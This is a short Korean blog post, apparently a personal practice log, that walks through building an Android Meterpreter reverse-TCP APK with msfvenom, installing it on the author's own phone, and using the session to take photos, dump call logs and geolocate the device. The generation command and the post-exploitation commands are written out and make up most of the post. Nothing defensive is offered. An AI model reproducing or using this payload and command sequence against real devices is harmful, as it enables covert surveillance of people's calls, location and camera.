안드로이드용 악성코드를 준비한다.

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.7 lport=1234 R > /root/바탕화면/android.apk

 

악성코드를 내 스마트폰에 옮겨준다.

 

여기서 느낀점은 피해자는 어플을 눌러줘야만 해커가 해킹을 시도한다는것이 문제점인거 같다.

 

 

 

 

내 핸드폰과 연결이 되었다.

 

session 연결 확인

 

session -i 1 내폰과 접속

 

 

 

 

폰을 키지도 않았는데 저절로 찍혔다.

 

dump_calllog 

- 통화 기록 을 볼수 있다.

 

geolocate

- 위치 추적

 

 

주소가 나오면 인터넷 주소창에다가 붙어넣기를 한다.

 

 

완전히 맞는 주소는 안나오지만 근접한 주소가 나오게 된다.

+ Recent posts